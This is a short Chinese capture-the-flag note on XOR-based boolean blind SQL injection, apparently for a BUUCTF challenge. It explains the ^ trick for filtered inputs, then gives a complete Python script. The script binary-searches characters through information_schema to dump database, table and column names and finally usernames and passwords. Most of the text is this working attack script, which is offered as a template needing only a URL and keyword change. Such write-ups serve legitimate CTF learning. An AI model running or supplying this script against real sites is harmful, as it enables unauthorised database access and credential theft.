知识点:
当过滤的东西很多很多的时候,可以考虑盲注,用 ^ 来判断是否可以进行脚本注入;
1^1^1=0 1^1^0=1;
以爆库名为例:
ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d
使用二分法查找数据库的每一个字母;具体脚本如下:
到时候只需要改回显的关键字和url就行
import requests
import time
url = "http://03251dcb-c0cc-4894-97d2-a9510b3705ab.node4.buuoj.cn:81/search.php"
temp = {"id": ""}
column = ""
for i in range(1, 1000):
time.sleep(0.06)
low = 32
high = 128
mid = (low + high) // 2
while (low < high):
# 库名
# temp["id"] = "1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1" %(i,mid)
# 表名
# temp["id"] = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)^1" %(i,mid)
# 字段名
# temp["id"] = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)^1" %(i,mid)
# 内容
temp["id"] = "1^(ascii(substr((select(group_concat(id,username,password))from(F1naI1y)),%d,1))>%d)^1" % (i, mid)
r = requests.get(url, params=temp)
time.sleep(0.04)
print(low, high, mid, ":")
if "Click" in r.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if (mid == 32 or mid == 127):
break
column += chr(mid)
print(column)
print("All:", column)
#